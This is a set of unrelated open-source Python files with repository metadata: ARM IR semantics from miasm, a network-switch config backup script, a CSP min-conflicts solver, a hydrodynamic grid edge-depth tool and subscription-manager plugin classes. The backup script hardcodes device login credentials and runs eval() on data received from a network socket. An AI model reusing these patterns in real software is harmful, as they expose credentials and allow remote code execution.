split = self.add_instr_to_current_state(
instr, block, assignments,
it_instr_irblocks, gen_pc_updt
)
if split:
raise NotImplementedError("Unsupported instr in IT block (%s)" % instr)
if it_instr_irblocks:
assert len(it_instr_irblocks) == 1
it_instr_irblocks = it_instr_irblocks.pop()
            # Remove flag assignments unless instr is one of CMP, CMN, TST
if instr.name not in ["CMP", "CMN", "TST"]:
# Fix assignments
out = []
for assignment in assignments:
assignment = AssignBlock(
{
dst: src for (dst, src) in viewitems(assignment)
if dst not in [zf, nf, of, cf]
},
assignment.instr
)
out.append(assignment)
assignments = out
                # Fix extra irblocks
new_irblocks = []
for irblock in it_instr_irblocks:
out = []
                for tmp_assignment in irblock:
                    assignment = AssignBlock(
                        {
                            dst: src for (dst, src) in viewitems(tmp_assignment)
                            if dst not in [zf, nf, of, cf]
                        },
                        tmp_assignment.instr
                    )
out.append(assignment)
new_irblock = IRBlock(irblock.loc_key, out)
new_irblocks.append(new_irblock)
it_instr_irblocks = new_irblocks
irblocks += it_instr_irblocks
dst = ExprAssign(self.IRDst, ExprLoc(loc_next, 32))
dst_blk = AssignBlock([dst], instr)
assignments.append(dst_blk)
irblock = IRBlock(loc, assignments)
irblocks.append(irblock)
loc = loc_next
assignments = []
ir_blocks_all.append(irblocks)
return index, ir_blocks_all
def add_asmblock_to_ircfg(self, block, ircfg, gen_pc_updt=False):
"""
Add a native block to the current IR
@block: native assembly block
@gen_pc_updt: insert PC update effects between instructions
"""
it_hints = None
it_cond = None
label = block.loc_key
assignments = []
ir_blocks_all = []
index = -1
while index + 1 < len(block.lines):
index += 1
instr = block.lines[index]
if label is None:
assignments = []
label = self.get_loc_key_for_instr(instr)
if instr.name.startswith("IT"):
index, irblocks_it = self.do_it_block(label, index, block, assignments, gen_pc_updt)
for irblocks in irblocks_it:
ir_blocks_all += irblocks
label = None
continue
split = self.add_instr_to_current_state(
instr, block, assignments,
ir_blocks_all, gen_pc_updt
)
if split:
ir_blocks_all.append(IRBlock(label, assignments))
label = None
assignments = []
if label is not None:
ir_blocks_all.append(IRBlock(label, assignments))
new_ir_blocks_all = self.post_add_asmblock_to_ircfg(block, ircfg, ir_blocks_all)
for irblock in new_ir_blocks_all:
ircfg.add_irblock(irblock)
return new_ir_blocks_all
class ir_armb(ir_arml):
def __init__(self, loc_db=None):
IntermediateRepresentation.__init__(self, mn_arm, "b", loc_db)
self.pc = PC
self.sp = SP
self.IRDst = ExprId('IRDst', 32)
self.addrsize = 32
class ir_armtl(ir_arml):
def __init__(self, loc_db=None):
IntermediateRepresentation.__init__(self, mn_armt, "l", loc_db)
self.pc = PC
self.sp = SP
self.IRDst = ExprId('IRDst', 32)
self.addrsize = 32
def mod_pc(self, instr, instr_ir, extra_ir):
# fix PC (+4 for thumb)
pc_fixed = {self.pc: ExprInt(instr.offset + 4, 32)}
for i, expr in enumerate(instr_ir):
dst, src = expr.dst, expr.src
if dst != self.pc:
dst = dst.replace_expr(pc_fixed)
src = src.replace_expr(pc_fixed)
instr_ir[i] = ExprAssign(dst, src)
for idx, irblock in enumerate(extra_ir):
extra_ir[idx] = irblock.modify_exprs(lambda expr: expr.replace_expr(pc_fixed) \
if expr != self.pc else expr,
lambda expr: expr.replace_expr(pc_fixed))
class ir_armtb(ir_armtl):
def __init__(self, loc_db=None):
IntermediateRepresentation.__init__(self, mn_armt, "b", loc_db)
self.pc = PC
self.sp = SP
self.IRDst = ExprId('IRDst', 32)
self.addrsize = 32
|
commial/miasm
|
miasm/arch/arm/sem.py
|
Python
|
gpl-2.0
| 49,320
|
#!/usr/bin/python
#
import socket
from device_cisco_hp import Device_cisco_hp
#from device_f5 import Device_f5
#from device_wlc import Device_wlc
import time
import sys
import re
import os
def recv_timeout(the_socket, timeout=2):
    # make socket non-blocking
    the_socket.setblocking(0)
    # data is collected piecewise in an array
    total_data = []
    data = ''
    # beginning time
    begin = time.time()
    while 1:
        # if some data was received, break after the timeout
        if total_data and time.time() - begin > timeout:
            break
        # if no data was received at all, wait a little longer (twice the timeout)
        elif time.time() - begin > timeout * 2:
            break
        # receive something
        try:
            data = the_socket.recv(8192)
            if data:
                total_data.append(data)
                # reset the beginning time for the measurement
                begin = time.time()
            else:
                # sleep for some time to indicate a gap
                time.sleep(0.1)
        except socket.error:
            # no data ready yet on the non-blocking socket
            pass
    # join all parts to make the final string
    return ''.join(total_data)
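# Minimal usage sketch for recv_timeout (host and port are placeholders, not
# taken from this script):
#   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#   s.connect(("livestatus.example", 6557))
#   s.send("GET hosts\nOutputFormat: python\n")
#   s.shutdown(socket.SHUT_WR)
#   answer = recv_timeout(s, timeout=2)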
def list_startswith(item, list):
found = False
for i in list:
if item.startswith(i):
found = True
break
return found
def list_find(item, list):
found = False
for i in list:
if item.find(i) != -1:
found = True
break
return found
def get_backuphosts(lql_answer_python):
    backuphosts = []
    backuphosts_ignored = []
    # all devices whose SNMP info string begins with one of the following are backed up
    snmpinfo_cisco_hp = [ "sysDescr: Cisco IOS Software",
                          "sysDescr: Cisco Internetwork Operating System Software",
                          "sysDescr: Cisco NX-OS",
                          "sysDescr: HP J",
                          "sysDescr: ProCurve J",
                          "sysDescr: Cisco Adaptive Security Appliance",
                          "sysDescr: Content Switch",
                          "sysDescr: ACE 4710 Application Control Engine Appliance"]
    #snmpinfo_f5 = ["sysDescr: Linux F5"]
    #snmpinfo_wlc = ["sysDescr: Cisco Controller"]
    # F5 and WLC backups are currently disabled; keep empty lists so the
    # return statement below stays well-defined
    snmpinfo_f5 = []
    snmpinfo_wlc = []
    #snmpinfo_all = snmpinfo_cisco_hp + snmpinfo_f5 + snmpinfo_wlc
    snmpinfo_all = snmpinfo_cisco_hp
    # these hosts are ignored
    ips_ignore = { "10.1.1.1":"LB_01",
                   "10.2.2.2":"LB_02",
                 }
    # decide whether each host in the table should be backed up or not
    for host in lql_answer_python:
        (host_name, host_alias, host_address, plugin_output, host_filename) = host
        if list_find(plugin_output, snmpinfo_all) and not host_address.startswith("10.127.") and host_address not in ips_ignore:
            backuphosts.append(host)
        else:
            backuphosts_ignored.append(host)
    # sort the lists
    backuphosts.sort(key=lambda tup: tup[0])
    backuphosts_ignored.sort(key=lambda tup: tup[0])
    return (backuphosts, backuphosts_ignored, snmpinfo_cisco_hp, snmpinfo_f5, snmpinfo_wlc)
# Fetch the config from the host
def get_config_cisco_hp(host, log_file):
    (host_name, host_alias, host_address, plugin_output, host_filename) = host
    device = Device_cisco_hp(host_address.strip(), log_file)
    # use Telnet for CSS load balancers
    if plugin_output.find("sysDescr: Content Switch") != -1:
        device.set_prefer_telnet()
    device.logging("--- Hostname: " + host_name)
    #device.set_debug_mode(True)
    #device.set_demo_config_mode(True)
    tacacs_username = 'test'
    tacacs_tpasswort = 'test1'
    ips_dsl = ["192.168.121.1", "192.168.121.2"]
    if list_startswith(host_address, ips_dsl):
        device.logging("--- Credentials: DSL switches")
        device.connect(tacacs_username, tacacs_tpasswort, 'test')
    else:
        device.logging("--- Credentials: TACACS only")
        device.connect(tacacs_username, tacacs_tpasswort)
    config = device.command("show running-config")
    write_memory_config(device, host)
    device.disconnect()
    return config
def write_memory_config(device, host):
(host_name, host_alias, host_address, plugin_output, host_filename) = host
snmpinfo_nexus = ["sysDescr: Cisco NX-OS"]
snmpinfo_ace = ["sysDescr: ACE 4710 Application Control Engine Appliance"]
snmpinfo_css = ["sysDescr: Content Switch"]
snmpinfo_hp = ["sysDescr: HP J", "sysDescr: ProCurve J"]
    if list_find(plugin_output, snmpinfo_nexus):
        save_output = device.command("copy running-config startup-config")
        if save_output.find("Copy complete") != -1:
            device.logging("--- INFO: -copy running-config startup-config- executed successfully")
        else:
            device.logging("ERROR: -copy running-config startup-config- could NOT be executed successfully!")
            device.logging(save_output)
    elif list_find(plugin_output, snmpinfo_ace):
        save_output = device.command("write memory")
        if save_output.find("Sync Done") != -1:
            device.logging("--- INFO: -write memory- executed successfully")
        else:
            device.logging("ERROR: -write memory- could NOT be executed successfully!")
            device.logging(save_output)
    elif list_find(plugin_output, snmpinfo_css):
        save_output = device.command("write memory")
        if save_output.find("Working..") != -1:
            device.logging("--- INFO: -write memory- POSSIBLY executed successfully")
        else:
            device.logging("ERROR: -write memory- could NOT be executed successfully!")
            device.logging(save_output)
    elif list_find(plugin_output, snmpinfo_hp):
        save_output = device.command("write memory")
        if len(save_output) == 1 or len(save_output) == 2:
            device.logging("--- INFO: -write memory- executed successfully")
        #else:
        #    device.logging("ERROR: -write memory- could NOT be executed successfully!")
        #    device.logging(save_output)
    else:
        save_output = device.command("write memory")
        if save_output.find("[OK]") != -1:
            device.logging("--- INFO: -write memory- executed successfully")
        else:
            device.logging("ERROR: -write memory- could NOT be executed successfully!")
            device.logging(save_output)
#def get_config_f5(host, log_file, path):
#def get_config_wlc(host, log_file, date):
# Save a text file to disk
def save_output(address, config, extension, path, date):
#date = time.strftime("%Y-%m-%d_%H-%M-%S")
file_name = str(address) + "_" + str(date) + "." + extension
config_file_path = path + file_name
fh = open(config_file_path,"w")
fh.writelines(config)
fh.close()
return config_file_path
def logging(log_file, msg):
log_file.writelines(msg)
print msg
def backup_devices(backuphosts, backuphosts_ignored, server, livestatus_log, snmpinfo_cisco_hp, snmpinfo_f5, snmpinfo_wlc):
base_path = "/daten/backup/backup_config/"
lastbackup_path = base_path + "lastbackup/"
date = time.strftime("%Y-%m-%d")
date_time = time.strftime("%Y-%m-%d_%H-%M-%S")
path = base_path + date + "_" + server[0] + "/"
if not os.path.exists(path):
os.mkdir(path)
if not os.path.exists(lastbackup_path):
os.mkdir(lastbackup_path)
log_file_path = path + "DEVICELOG_" + date_time + ".log"
log_file = open(log_file_path,"w")
logging(log_file, livestatus_log)
    # create a symlink to the log file
log_file_symlink = lastbackup_path + "DEVICELOG_" + server[0] + ".log"
if os.path.islink(log_file_symlink):
os.unlink(log_file_symlink)
os.symlink(log_file_path.replace(base_path,"../"), log_file_symlink)
for host in backuphosts:
(host_name, host_alias, host_address, plugin_output, host_filename) = host
try:
logging(log_file, "\n\n")
config = "# CheckMK-host_name: " + str(host_name)
config += "\n# CheckMK-host_alias: " + str(host_alias)
config += "\n# CheckMK-host_address: " + str(host_address)
config += "\n# CheckMK-host_filename: " + str(host_filename)
config += "\n# CheckMK-SNMPInfov2: " + str(plugin_output)
config += "\n#----------------------------------------------------------------\n\n\n\n"
            # fetch the config from the device
if list_find(plugin_output, snmpinfo_cisco_hp):
device_config = get_config_cisco_hp(host,log_file)
# elif list_find(plugin_output, snmpinfo_f5):
# device_config = get_config_f5(host,log_file, path)
# elif list_find(plugin_output, snmpinfo_wlc):
# device_config = get_config_wlc(host, log_file, date)
            else:
                raise Exception("ERROR: no 'get_config()' method found for host!")
            if len(device_config) == 0:
                logging(log_file, "ERROR: device config is empty")
            config += device_config
            # write the config to a file
config_file_path = save_output(host_address, config, "config", path, date_time)
logging(log_file,"--- Backupfile: " + config_file_path)
            # create a symlink pointing at the latest backup
lastbackup_config_link = lastbackup_path + host_address + ".config"
if os.path.islink(lastbackup_config_link):
os.unlink(lastbackup_config_link)
os.symlink(config_file_path.replace(base_path,"../"), lastbackup_config_link)
except Exception, e:
logging(log_file,"ERROR: %s" % str(e) )
save_output(host_address, str(e), "error", path, date_time)
# ------------------------------------------------------------
if len(backuphosts_ignored) > 0:
logging(log_file,"\n\n\n\nIgnored Hosts:\n\n")
for host in backuphosts_ignored:
(host_name, host_alias, host_address, plugin_output, host_filename) = host
logging(log_file,"\nIP: " + host_address)
logging(log_file,", Hosts: " + host_name)
log_file.close()
def get_hostByLivestatus():
#socket_path = "/omd/sites/prod/tmp/run/live"
#s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
#s.connect(socket_path)
all_server = [('1.1.1.1', 6557),('2.2.2.2', 6557)]
lql = "GET services\n"
lql += "Columns: host_name host_alias host_address plugin_output host_filename\n"
lql += "Filter: check_command = check_mk-snmp_info_v2\n"
lql += "Filter: host_plugin_output !~ No IP packet received\n"
lql += "OutputFormat: python\n"
#lql += "Limit: 11\n"
for server in all_server:
try:
livestatus_log = ""
msg = "\n#--------------------------------------------------------------------------------\n\n"
msg += "Verbinde zu: " + str(server)
livestatus_log += msg + "\n"
print msg
max_attempts = 10
for attempt in range(max_attempts):
msg = "Verbindungsversuch: #" + str(attempt)
livestatus_log += msg + "\n"
print msg
                # connect to the server and run the LQL query
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(server)
s.send(lql)
s.shutdown(socket.SHUT_WR)
lql_answer = recv_timeout(s)
                if len(lql_answer) < 10:
                    # retry until the final attempt; only then give up
                    if attempt < max_attempts - 1:
                        time.sleep(20)
                    else:
                        raise Exception("ERROR: no data received from the server!")
                else:
                    break
            # convert the answer into Python data structures
            # (note: eval() blindly trusts the Livestatus server here)
            lql_answer_python = eval(lql_answer)
            if len(lql_answer_python) < 10:
                raise Exception("ERROR: the data received from the server could not be converted into Python data!")
            # each host in the table is split into the two lists backuphosts and backuphosts_ignored
(backuphosts, backuphosts_ignored, snmpinfo_cisco_hp, snmpinfo_f5, snmpinfo_wlc) = get_backuphosts(lql_answer_python)
            # every device in backuphosts gets backed up
backup_devices(backuphosts, backuphosts_ignored, server, livestatus_log, snmpinfo_cisco_hp, snmpinfo_f5, snmpinfo_wlc)
#print backuphosts
        except Exception, e:
            livestatus_log += str(e) + "\n"
            print str(e)
            # still write a log for this server; the function takes seven
            # arguments, so pass an empty snmpinfo list for each device family
            backup_devices([], [], server, livestatus_log, [], [], [])
get_hostByLivestatus()
|
christianbur/check_mk
|
network_management_with_cmk/backup_switche.py
|
Python
|
gpl-2.0
| 12,734
|
"""This file contains different Solving Agents for CSP Problems """
def minConflict(problem, numIter=100000):
"""Min Conflict : Solves Constraint Satisfaction Problems.
Given a possible assignment of all variables in CSP, it re-assigns all variables iteratively untill all contraints are satisfied
INPUTS:
problem: CSP Problem
numIter: Number of maximum Iterations Allowed
OUTPUT
Solution to CSP, or failure
"""
print 'number of iterations =', numIter
state = problem.getStartState()
print "Initial State"
problem.visualize(state)
for i in range(numIter):
var = problem.getVar(state) #Get the next conflicted variable randomly
#No conflict, i.e. We have solved the problem
if var == -1:
print "Solution state found in", i, "iterations"
problem.visualize(state)
return state
        val = problem.getValue(state, var) # Get the value to assign: chosen to cause the fewest conflicts, ties broken randomly
state = problem.updateBoard(state, var, val)
print "Solution not found! Try with high iterations"
return []
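
# Minimal sketch of the problem interface minConflict() assumes; this ToyCSP
# class is a hypothetical illustration, not part of the original module. Any
# real CSP just needs the same five methods.
import random

class ToyCSP(object):
    """Three variables over domain {0, 1, 2}; constraint: all values distinct."""
    def getStartState(self):
        return [0, 0, 0]
    def getVar(self, state):
        # return a random conflicted variable, or -1 if no conflicts remain
        conflicted = [i for i, v in enumerate(state) if state.count(v) > 1]
        return random.choice(conflicted) if conflicted else -1
    def getValue(self, state, var):
        # pick the value causing the fewest conflicts; break ties randomly
        def conflicts(val):
            return sum(1 for i, v in enumerate(state) if i != var and v == val)
        best = min(conflicts(val) for val in range(3))
        return random.choice([val for val in range(3) if conflicts(val) == best])
    def updateBoard(self, state, var, val):
        state = list(state)
        state[var] = val
        return state
    def visualize(self, state):
        print state

# Usage sketch: minConflict(ToyCSP(), numIter=100)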
|
kushjain/Min-Conflicts
|
solveAgent.py
|
Python
|
gpl-2.0
| 1,214
|
"""Helper code for running QuickTile functional tests"""
__author__ = "Stephan Sokolow (deitarion/SSokolow)"
__license__ = "GNU GPL 2.0 or later"
|
ssokolow/quicktile
|
functional_harness/__init__.py
|
Python
|
gpl-2.0
| 147
|
# Utilities for specifying edge depths:
import getopt
import sys,os
sys.path.append(os.path.join(os.environ['HOME'], 'python'))
from numpy import *
import sunreader
#reload(sunreader)
import pdb
class EdgeDepthWriter(object):
""" For a grid that has been partitioned, write out new edge-based bathymetry
and update the cell bathymetry accordingly.
If a depth field is specified to run, it will be queried (via value_on_edge) for
the edge depths.
If no depth field is given, but the sunreader instance has a global edgedepths.dat,
it will be mapped to the per-processor edges.
Otherwise the previous cell depths will be interpolated to get
the new edge depths.
Either way, new cell depths are taken as the minimum depth of adjacent edges.
"""
def __init__(self,delete_friction_strips=False):
""" delete_friction_strips: if true, a final step will lower edges to the elevation
of the higher of the two cell neighbors. Note that this is done *after* the
cells were set to the lowest neighboring edge, so the overall effect is to
increase flux areas.
by default, the edges will have already been set to be the elevation of the
shallower neighboring cell, based on cell depths. That tends to smear out
edge depths, and on average make the flux areas too small.
"""
self.delete_friction_strips = delete_friction_strips
def run(self,argv=[],sun=None,depth_field=None):
""" Specify one of sun, or command-line style argv
        at the moment only a single command-line argument is supported, specifying the
        datadir to read from
"""
if sun is not None:
self.sun = sun
else:
## Handle command line
datadir = '.'
opts,rest = getopt.getopt(argv,'')
for opt,val in opts:
pass
if len(rest):
datadir = rest[0]
## Prep
self.sun = sunreader.SunReader(datadir)
try:
self.sun.file_path('edgedepths',0)
except:
print "Maybe you need to set edgedepths in suntans.dat?"
raise
## Do it.
self.process(depth_field=depth_field)
def process(self,depth_field=None):
np = self.sun.num_processors()
global_edge_depths = None
global_grid = None
## Establish the source for edge depths
if depth_field is None:
fn = self.sun.file_path('edgedepths')
if os.path.exists( fn ):
print "Loading global edge depths and mapping global->local"
global_edge_depths = loadtxt(fn)
global_grid = self.sun.grid()
else:
print "Looking for edge depth file %s"%fn
print "Will resort to linear interpolation of cell depths for edge depth"
else:
print "Will use explicitly given depth field for edge elevations"
# will have to hold all data at one time..
proc_edgedepths = [None] * np
proc_edgedata = [None] * np
proc_celldata = [None] * np
# 1 - get edge elevations and Nke.
for proc in range(self.sun.num_processors()):
edgedata = self.sun.edgedata(proc)
celldata = self.sun.celldata(proc)
g = self.sun.grid(proc)
edgedepths = zeros( len(edgedata), float64 )
# Save for inter-proc use:
proc_edgedata[proc] = edgedata
proc_celldata[proc] = celldata
proc_edgedepths[proc] = edgedepths
# if depth_field exists, query directly for edge depths
# if global_edge_depths exists, take pre-calculated edge depths from there
# otherwise, interpolate between neighboring cells.
for j in range(len(edgedata)):
if depth_field is not None:
de = depth_field.value_on_edge( g.points[g.edges[j,:2]] )
elif global_edge_depths is not None:
global_j = global_grid.find_edge( g.edges[j,:2] )
de = global_edge_depths[global_j,2]
else:
nc1,nc2 = edgedata[j,8:10].astype(int32)
face1,face2 = edgedata[j,10:12].astype(int32)
if nc2 < 0:
nc2 = nc1
face2 = face1
elif nc1 < 0:
nc1 = nc2
face1 = face2
df1 = celldata[nc1,14+face1]
df2 = celldata[nc2,14+face2]
# linearly interpolate
de = (df1*celldata[nc2,3] + df2*celldata[nc1,3]) / (df1+df2)
edgedepths[j] = de
## Update Nke
# de are as soundings.
# h_to_ctop expects elevations, and by default uses dzmin to get the
# surface behavior.
# add 1 because Nke is the *number* of levels, whereas h_to_ctop gives
# the *index* of the level where this elevation belongs.
        # for example, if the z-levels are every 0.5m and the edge depth is exactly 4.5,
        # this should give us Nke = 9 (the edge spans the top nine levels)
# Add the epsilon to make sure that any roundoff from the interpolation above doesn't
# screw up an exact comparison
offenders = nonzero(edgedepths > self.sun.z_levels()[-1])[0]
# allow a bit of leeway in case of ascii roundoff - fix it regardless, but only
# report the issue if it's significant.
bad_offenders = nonzero(edgedepths > 1e-5 + self.sun.z_levels()[-1])[0]
if len(offenders) > 0:
if len(bad_offenders) > 0:
print "Bottom of lowest z-level is %f"%self.sun.z_levels()[-1]
print "There were %d edges given a depth below this"%len(offenders)
print "And %d of those are significant "%len(bad_offenders)
print "too deep by these distances: "
print edgedepths[bad_offenders] - self.sun.z_levels()[-1]
# raise Exception,"Whoa there - edges are too deep!"
print "WARNING: these edges will have their depth truncated. "
print " to avoid this, specify a vertspace.dat.in that goes"
print " deep enough"
edgedepths[offenders] = self.sun.z_levels()[-1]
edgedata[:,6] = searchsorted(self.sun.z_levels()+1e-8,edgedepths) + 1
# double check
nkmax = self.sun.conf_int('Nkmax')
if nkmax>1 and any(edgedata[:,6]>nkmax):
raise Exception,"How did a deep edge get through?"
# Interprocessor - only exchange Nke from edgedata:
self.sun.sendrecv_edges([a[:,6] for a in proc_edgedata])
self.sun.sendrecv_edges(proc_edgedepths)
## Set cell depth, Nk from deepest edge
for proc in range(self.sun.num_processors()):
edgedata = proc_edgedata[proc]
celldata = proc_celldata[proc]
edgedepths = proc_edgedepths[proc]
# Update cell depths and Nk[] from the edges
for i in range(len(celldata)):
js = celldata[i,5:8].astype(int32)
# depth = max(depth)
celldata[i,3] = edgedepths[js].max()
# Nk = max(Nke)
celldata[i,4] = edgedata[js,6].max()
# And update the edge's Nkc
for j in range(len(edgedata)):
nc1,nc2 = edgedata[j,8:10].astype(int32)
if nc2 < 0:
nc2 = nc1
elif nc1 < 0:
nc1 = nc2
edgedata[j,7] = max( celldata[nc1,4],
celldata[nc2,4] )
# Now Nkc on marker 6 edges is corrupt - fix it
# those edges could only see one cell locally, but the neighbor
# proc has both cells, so get Nkc from the neighbor
self.sun.sendrecv_edges([a[:,7] for a in proc_edgedata])
## Optionally lower high edges to their higher cell neighbor.
if self.delete_friction_strips:
print "Removing friction strips by lowering edge depths"
for proc in range(self.sun.num_processors()):
edgedata = proc_edgedata[proc]
celldata = proc_celldata[proc]
edgedepths = proc_edgedepths[proc]
for j in range(len(edgedata)):
nc1,nc2 = edgedata[j,8:10].astype(int32)
face1,face2 = edgedata[j,10:12].astype(int32)
if nc2 < 0:
nc2 = nc1
face2 = face1
elif nc1 < 0:
nc1 = nc2
face1 = face2
df1 = celldata[nc1,14+face1]
df2 = celldata[nc2,14+face2]
# take the shallower cell
edgedepths[j] = min(celldata[nc1,3],celldata[nc2,3])
edgedata[j,6] = min(celldata[nc1,4],celldata[nc2,4])
# And we still have to fix those interprocessor edges:
self.sun.sendrecv_edges([a[:,6] for a in proc_edgedata]) # Nke
self.sun.sendrecv_edges(proc_edgedepths) # de
## Write it out
for proc in range(self.sun.num_processors()):
edgedata = proc_edgedata[proc]
celldata = proc_celldata[proc]
edgedepths = proc_edgedepths[proc]
# WRITE IT OUT
# maybe a little funky - sunreader keeps a reference to edgedata,
# and we have been passing this reference around the whole time -
# so no need to pass back in the modified edgedata.
# remove them first to avoid overwriting symlinked copies:
os.unlink(self.sun.file_path('celldata',proc))
os.unlink(self.sun.file_path('edgedata',proc))
self.sun.write_edgedata(proc)
self.sun.write_celldata(proc)
fp = open(self.sun.file_path('edgedepths',proc),'wt')
for j in range(len(edgedepths)):
fp.write("%.6f %.6f %.6f\n"%(edgedata[j,4], edgedata[j,5], edgedepths[j]))
fp.close()
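    # Note: the edgedepths file written above is plain text with one edge per
    # line, "x y depth" (coordinates from edgedata columns 4 and 5, depth as a
    # positive-down sounding) - the same format loadtxt() reads back at the top
    # of process().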
if __name__ == '__main__':
edw = EdgeDepthWriter()
edw.run()
|
rustychris/stomel
|
src/edge_depths.py
|
Python
|
gpl-2.0
| 10,647
|
# Copyright (c) 2013 Red Hat, Inc.
#
# This software is licensed to you under the GNU General Public License,
# version 2 (GPLv2). There is NO WARRANTY for this software, express or
# implied, including the implied warranties of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. You should have received a copy of GPLv2
# along with this software; if not, see
# http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt.
#
# Red Hat trademarks are not licensed under GPLv2. No permission is
# granted to use or replicate Red Hat trademarks that are incorporated
# in this software or its documentation.
#
import glob
import inspect
import logging
import os
import importlib.util
from iniparse import SafeConfigParser
from iniparse.compat import NoSectionError, NoOptionError
from rhsm.config import get_config_parser
from subscription_manager.base_plugin import SubManPlugin
# The API_VERSION constant defines the current plugin API version. It is used
# to decide whether or not plugins can be loaded. It is compared against the
# 'requires_api_version' attribute of each plugin. The version number has the
# format: "major_version.minor_version".
#
# For a plugin to be loaded, the major version required by the plugin must match
# the major version in API_VERSION. Additionally, the minor version in
# API_VERSION must be greater than or equal to the minor version required by
# the plugin.
#
# If a change is made that breaks backwards compatibility with regard to the plugin
# API, the major version number must be incremented and the minor version number
# reset to 0. If a change is made that doesn't break backwards compatibility,
# then the minor number must be incremented.
API_VERSION = "1.1"
DEFAULT_SEARCH_PATH = "/usr/share/rhsm-plugins/"
DEFAULT_CONF_PATH = "/etc/rhsm/pluginconf.d/"
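# Illustrative sketch (not part of this module's API): the compatibility rule
# described in the comment above, assuming "major.minor" version strings.
def _example_api_version_ok(required, provided=API_VERSION):
    req_major, req_minor = [int(part) for part in required.split(".")]
    prov_major, prov_minor = [int(part) for part in provided.split(".")]
    # major versions must match exactly; provided minor must cover required
    return req_major == prov_major and prov_minor >= req_minor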
cfg = get_config_parser()
log = logging.getLogger(__name__)
class PluginException(Exception):
"""Base exception for rhsm plugins."""
def _add_message(self, repr_msg):
if hasattr(self, "msg") and self.msg:
repr_msg = "\n".join([repr_msg, "Message: %s" % self.msg])
return repr_msg
class PluginImportException(PluginException):
"""Raised when a SubManPlugin derived class can not be imported."""
def __init__(self, module_file, module_name, msg=None):
self.module_file = module_file
self.module_name = module_name
self.msg = msg
def __str__(self):
repr_msg = "Plugin \"%s\" can't be imported from file %s" % \
(self.module_name, self.module_file)
return self._add_message(repr_msg)
class PluginModuleImportException(PluginImportException):
"""Raise when a plugin module can not be imported."""
class PluginModuleImportApiVersionMissingException(PluginImportException):
"""Raised when a plugin module does not include a 'requires_api_version'."""
def __str__(self):
repr_msg = """Plugin module "%s" in %s has no API version.
'requires_api_version' should be set.""" % \
(self.module_name, self.module_file)
return self._add_message(repr_msg)
class PluginModuleImportApiVersionException(PluginImportException):
"""Raised when a plugin module's 'requires_api_version' can not be met."""
def __init__(self, module_file, module_name, module_ver, api_ver, msg=None):
self.module_file = module_file
self.module_name = module_name
self.module_ver = module_ver
self.api_ver = api_ver
self.msg = msg
def __str__(self):
repr_msg = "Plugin \"%s\" requires API version %s. Supported API is %s" % \
(self.module_name, self.module_ver, self.api_ver)
return self._add_message(repr_msg)
class PluginConfigException(PluginException):
"""Raised when a PluginConfig fails to load or read a config file."""
def __init__(self, plugin_name, msg=None):
self.plugin_name = plugin_name
self.msg = msg
def __str__(self):
repr_msg = "Cannot load configuration for plugin \"%s\"" % (self.plugin_name)
return self._add_message(repr_msg)
# raised if code tries to run a hook for a slot_name that doesn't exist
class SlotNameException(Exception):
"""Raised when PluginManager.run() is called with a unknown slot_name."""
def __init__(self, slot_name):
self.slot_name = slot_name
def __str__(self):
return "slot name %s does not have a conduit to handle it" % self.slot_name
class BaseConduit(object):
"""An API entry point for rhsm plugins.
Conduit()'s are used to provide access to the data a SubManPlugin may need.
Each 'slot_name' has a BaseConduit() subclass associated with it by PluginManager().
Whenever a slot is reached, PluginManager will find all the SubManPlugin methods
that handle the slot, as well as any Conduit() that is mapped to the slot.
PluginManager.run(slot_name, kwargs) finds the proper Conduit for slot_name,
then creates an instance, passing in the values of kwargs. Then PluginManager.run
    calls the associated SubManPlugin hook, passing it the Conduit().
Conduits provide access to subscription-manager configuration, as well
as a logger object.
Conduit() subclasses can provide additional methods.
Note the conf instance is expected to be a PluginConfig, and/or
have a 'parser' attribute that looks like a ConfigParser.SafeConfigParser.
Args:
clazz: A SubManPlugin subclass that will use this Conduit()
conf: A PluginConf for the class passed as clazz
Attributes:
slots: A list of slot_name strings this Conduit() will handle
log: a logger handler
"""
slots = []
    # clazz is the class object of the plugin instance that the hook method maps to
def __init__(self, clazz, conf=None):
if conf:
self._conf = conf
else:
self._conf = clazz.conf
# maybe useful to have a per conduit/per plugin logger space
self.log = logging.getLogger(clazz.__name__)
def conf_string(self, section, option, default=None):
"""get string from plugin config
Args:
section: config section name
option: config option name
default: if section or option are not found,
return default. None if not
specified.
Returns:
a string. In the case of error, default
is returned. If default is not specified,
None is returned.
"""
try:
return self._conf.parser.get(section, option)
except (NoSectionError, NoOptionError):
if default is None:
return None
return str(default)
def conf_bool(self, section, option, default=None):
"""get boolean value from plugin config
Args:
section: config section name
option: config option name
default: if section or option are not found,
return default.
Raises:
ValueError: value requested is not a boolean
Returns:
a python boolean. In the case of error, default
is returned. If default is not specified and
there is an error, a ValueError is raised.
"""
try:
return self._conf.parser.getboolean(section, option)
except (NoSectionError, NoOptionError):
if default is True:
return True
elif default is False:
return False
else:
raise ValueError("Boolean value expected")
def conf_int(self, section, option, default=None):
"""get integer value from plugin config
Args:
section: config section name
option: config option name
default: if section or option are not found,
return default.
Raises:
ValueError: value requested can not be made into an integer
Returns:
a python integer. In the case of error, default
is returned. If default is not specified, a
ValueError is raised.
"""
try:
return self._conf.parser.getint(section, option)
except (NoSectionError, NoOptionError):
try:
val = int(default)
except (ValueError, TypeError):
raise ValueError("Integer value expected")
return val
def conf_float(self, section, option, default=None):
"""get float value from plugin config
Args:
section: config section name
option: config option name
default: if section or option are not found,
return default.
Raises:
ValueError: value requested can not be made into
a float
Returns:
a python float. In the case of error, default
is returned. If default is not specified, a
ValueError is raised.
"""
try:
return self._conf.parser.getfloat(section, option)
except (NoSectionError, NoOptionError):
try:
val = float(default)
except (ValueError, TypeError):
raise ValueError("Float value expected")
return val
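    # Usage sketch inside a hypothetical plugin hook (names below are
    # illustrative, not part of this module):
    #   def pre_register_consumer_hook(self, conduit):
    #       verbose = conduit.conf_bool('main', 'verbose', default=False)
    #       retries = conduit.conf_int('main', 'retries', default=3)
    #       conduit.log.debug("verbose=%s retries=%s", verbose, retries)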
class RegistrationConduit(BaseConduit):
"""Conduit for uses with registration."""
slots = ['pre_register_consumer']
def __init__(self, clazz, name, facts):
"""init for RegistrationConduit
Args:
name: ??
facts: a dictionary of system facts
"""
super(RegistrationConduit, self).__init__(clazz)
self.name = name
self.facts = facts
class PostRegistrationConduit(BaseConduit):
"""Conduit for use with post registration."""
slots = ['post_register_consumer']
